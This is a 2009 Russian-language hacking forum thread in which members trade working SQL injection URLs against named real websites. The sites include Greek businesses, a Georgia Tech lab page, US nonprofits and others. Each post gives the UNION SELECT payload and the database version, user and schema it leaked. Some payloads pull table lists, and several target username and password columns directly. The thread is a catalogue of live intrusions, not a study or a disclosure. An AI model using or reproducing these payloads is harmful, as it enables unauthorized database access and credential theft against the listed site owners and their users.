SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://sparvy.free.fr/cv/showcv.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--


    5.0.67:SPARVY:[email protected]

    короче при поиске таблиц кидает ошибку =\

    ------------------------------------------------------------------------
    http://artistlikeourselves.com/alo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a,versi on(),data base(),user()),28/*

    4.0.27-standard-log:db195527007:[email protected]

    ------------------------------------------------------------------------
    PR:7

    попробуй прочитай

    http://www.ktp.gr/am.php?id=1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4--

    5.0.45-log:ktp_new:root@localhost

    http://www.ktp.gr/am.php?id=1+union+select+1,2,concat_ws(0x3a,table_name,0x3a),4+from+information_schema.tables--


    это жесть сайт, а скока таблов =\
     
    _________________________
    #9141 HAXTA4OK, 5 May 2009
    Last edited: 5 May 2009
    1 person likes this.
  2. _SEREGA_

    _SEREGA_ Banned

    Joined:
    28 Mar 2008
    Messages:
    132
    Likes Received:
    44
    Reputations:
    7
    скуль:

    Code:
    http://www.thiederman.com/products_detail.php?id=-10+union+select+1,2,3,4,5,6--  
    версия:

    Code:
    http://www.thiederman.com/products_detail.php?id=-10+union+select+1,version(),3,4,5,6--

    4.0.25
    =(

    infa:

    Code:
    http://www.thiederman.com/products_detail.php?id=-10+union+select+1,concat_ws(0x3a,user(),database()),3,4,5,6--
    user() thieder@localhost
    database() thieder
     
    1 person likes this.
  3. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.tvsat.gr/static.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2--

    5.0.77-community:tvsat_dorif:tvsat_root@localhost

    PR: 2
     
    _________________________
    1 person likes this.
  4. _SEREGA_

    _SEREGA_ Banned

    Joined:
    28 Mar 2008
    Messages:
    132
    Likes Received:
    44
    Reputations:
    7
    скуль:

    Code:
    http://www.netevents.org/recent-eventsdetail.php?id=10+union+select+1,2,3,4,5--
    версия:

    Code:
    http://www.netevents.org/recent-eventsdetail.php?id=10+union+select+1,version(),3,4,5--
    4.1.22

    infa:

    Code:
    http://www.netevents.org/recent-eventsdetail.php?id=10+union+select+1,concat_ws(0x3a,user(),database()),3,4,5--
    user() videodem@localhost
    database() netevents
     
  5. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.hcmr.gr/english_site/news/latest/hot_topics/show_hot.php?id=-1+union+select+1,concat_ws(0x3a,version(),databa se(),user ()),3,4,5,6,7,8--


    5.0.33-log:hot_topics:public@localhost

    ТИЦ: 20
    PR: 7
     
    _________________________
    1 person likes this.
  6. _SEREGA_

    _SEREGA_ Banned

    Joined:
    28 Mar 2008
    Messages:
    132
    Likes Received:
    44
    Reputations:
    7
    скуль:

    Code:
    http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,2--
    версия:

    Code:
    http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,version()--
    5.0.27-standard

    таблицы выводятся limit'om:

    Code:
    http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,table_name+from+information_schema.tables--
    столбцы выводятся limit'om:

    Code:
    http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,column_name+from+information_schema.columns--
    infa:

    Code:
    http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,concat_ws(0x3a,user(),database())--
    user() [email protected]
    database() slatsvideo2
     
  7. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    4.1.22:board2mclcom:board@localhost
     
    1 person likes this.
  8. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://synlab.gatech.edu/project.php?id=-61+union+select+1,version(),3,4,5,6,7,8/*
    5.0.45
     
    1 person likes this.
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    https://secure.vortec.com/store_products.php?catID=31&prodID=89+union+select+1,2,3,4,5,6,7,concat_ws(0x3b,version(),user(),database()),9,0,11,12,13,14,15,16,17,18,19,0,21,22+--

    5.0.67-log;[email protected];vortec_db
     
    _________________________
  10. _SEREGA_

    _SEREGA_ Banned

    Joined:
    28 Mar 2008
    Messages:
    132
    Likes Received:
    44
    Reputations:
    7
    скуль:

    Code:
    http://www.exhalefitness.ca/index.php?id=-10+union+select+1,2,3,4,5,6--
    версия:

    Code:
    http://www.exhalefitness.ca/index.php?id=-10+union+select+1,version(),3,4,5,6--
    5.0.51-log

    таблицы выводятся limit'om:

    Code:
    http://www.exhalefitness.ca/index.php?id=-10+union+select+1,table_name,3,4,5,6+from+information_schema.tables--
    столбцы выводятся limit'om:

    Code:
    http://www.exhalefitness.ca/index.php?id=-10+union+select+1,column_name,3,4,5,6+from+information_schema.columns--
    infa:

    Code:
    http://www.exhalefitness.ca/index.php?id=-10+union+select+1,concat_ws(0x3a,user()),3,4,5,6--
    user() [email protected]
     
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    _http://www.palaver.se/page.php?catid=-92+union+select+1,2,3,concat_ws(0x3b,version(),user(),database()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,00,1

    5.0.32-Debian_7etch10-log;[email protected];palaver_se


    _http://www.dhool.com/sotd2/catlist.php?catid=21+union+select+unhex(hex(concat_ws(0x3b,version(),user(),database()))),2

    4.1.14;dhooluser@localhost;dhooldb

    _http://www.stranadetstva.ru/osnov.php?idraz=-3+union+select+1,concat_ws(0x3b,version(),user(),database())+--

    5.0.33;us4320a@localhost;db4320a
     
    _________________________
    #9151 winstrool, 6 May 2009
    Last edited: 6 May 2009
  12. _SEREGA_

    _SEREGA_ Banned

    Joined:
    28 Mar 2008
    Messages:
    132
    Likes Received:
    44
    Reputations:
    7
    скуль:

    Code:
    http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,2,3,4,5,6,7,8--
    версия:

    Code:
    http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,version(),3,4,5,6,7,8--
    5.0.67-log

    таблицы выводятся limit'om:

    Code:
    http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables--
    столбцы выводятся limit'om:

    Code:
    http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns--
    infa:

    Code:
    http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,concat_ws(0x3a,user(),database()),3,4,5,6,7,8--
    user() [email protected]
    database() upa
     
    1 person likes this.
  13. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.touristicunion.gr/default.php?id=-1'+union+select+1,2,@@ver sion,4,5,6,7/*&lan g=en

    5.0.45 дальше стена =\

    PR: 4
    ------------------------------------------------------------------------
    http://www.corfuhouse.gr/real_estate.php?lang=en&id=1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database (),u ser()),10,11,12,13,14,15,16,17,18--

    4.0.26:corfuhouse_gr:corfuhou@localhost
    ------------------------------------------------------------------------
    халява фм в греции

    PR: 4

    http://www.freefm.gr/new.php?id=-1+union+select+1,concat_ws(0x3a,versi on(),datab ase(),user()),3,4--

    5.0.67-community:free98_fr98:free98_freefm@localhost


    http://www.freefm.gr/new.php?id=-1+union+se lect+1,group_concat(table_name),3,4+from +information_schem a.tables+group+by+table_schema--

    таблы:
    links,sunday,downloads,monday,thursday,events,news,tuesday,friday,saturday,wednesday
     
    _________________________
    #9153 HAXTA4OK, 6 May 2009
    Last edited: 6 May 2009
    1 person likes this.
  14. erihtoney

    erihtoney Member

    Joined:
    3 Mar 2009
    Messages:
    91
    Likes Received:
    73
    Reputations:
    20
    Опять Грузия (

    Code:
    http://internet.ge/v2/index.php?action=catalogue&catid=4444444444444&start=1+union+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12,13,14,15,16,17,18,19,
    20,21,22+from+stat.users/*
     
    1 person likes this.
  15. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.dipyl on.gr/main.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),us er()),3,4--

    5.0.67-community:dipylon_main:dipylon_mainuser@localhost

    http://www.dipylon.gr/main.php?id=-1+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+group+by+table_schema--

    Одна тока табла =\ :
    d_partners
     
    _________________________
  16. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    PR: 3


    http://www.cinematic.gr/link_en.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,ver sion(),datab ase(),user()),8,9--

    4.1.22-standard-log:cinemati_admin:cinemati_admin1@localhost
    ------------------------------------------------------------------------



    а где скуля ? =\ доработай скулю, или я просто туплю? =\
     
    _________________________
    #9156 HAXTA4OK, 6 May 2009
    Last edited: 6 May 2009
    1 person likes this.
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    _http://www.indmedica.com/specialities.php?catid=-16+union+select+1,version(),3,4,5+--

    5.0.45;indmedica@localhost;indmedica

    _http://www.kargah.com/names.php?catid=-5+union+select+1,2,concat_ws(0x3b,version(),user(),database()),4,5,6,7,8,9,0,1,12+--

    4.1.22-standard;kargahc_kargah@localhost;kargahc_host002
     
    _________________________
    2 people like this.
  18. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 4]
    Code:
    http://www.emergentarchitecture.com/about_analogies.php?id=-42+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6-- 
    5.0.67-log:twisco_emergentdb:[email protected]
     
    2 people like this.
  19. erihtoney

    erihtoney Member

    Joined:
    3 Mar 2009
    Messages:
    91
    Likes Received:
    73
    Reputations:
    20
    Code:
    http://www.utsg.net/publication.php?Year=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a,version(),user(),database()),30
    [info]
    version:4.0.27-max-log
    user:[email protected]
    database:db127835715

    [users]
    HTML:
    http://www.utsg.net/publication.php?Year=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(username,0x3a,password),30+from+users--
     
    1 person likes this.
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Разработка, продвижение и обслуживание интернет-сайтов.

    Code:
    http://www.vikki-di.ru/show.php?id=-54+union+select+1,concat(table_name,0x3a,table_rows),3,4,5,6,7,8,9,0,11,12,13,14,15,16+from+information_schema.tables--
     
Thread Status:
Not open for further replies.